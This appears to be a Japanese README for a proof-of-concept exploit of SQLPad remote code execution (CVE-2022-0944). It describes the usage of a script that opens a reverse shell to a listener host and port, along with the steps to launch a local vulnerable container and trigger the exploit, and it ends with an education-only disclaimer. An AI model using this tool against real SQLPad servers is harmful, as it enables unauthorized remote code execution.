
SQLPad RCE (CVE-2022-0944) の概念実証エクスプロイト
SQLPad RCE (CVE-2022-0944) の概念実証エクスプロイトです。
usage: main.py [-h] url lhost lport [username] [password]
positional arguments:
url URL to SQLPad
lhost Listener host address for reverse shell
lport Listener port for reverse shell
username login username (optional)
password login password (optional)
options:
-h, --help show this help message and exit
例:
# install requirements
pip install -r requirements.txt
# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0
# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin
このリポジトリに含まれるコードおよびツールは、教育目的、特にサイバーセキュリティコースや学習環境での使用のみを目的としています。本コードの作成者は、本コードの使用、誤用、または改変に起因するいかなる結果に対しても責任を負いません。本コードは「現状のまま」提供され、明示または黙示を問わず、商品性または特定目的への適合性の黙示的保証を含むがこれに限定されない、いかなる保証もありません。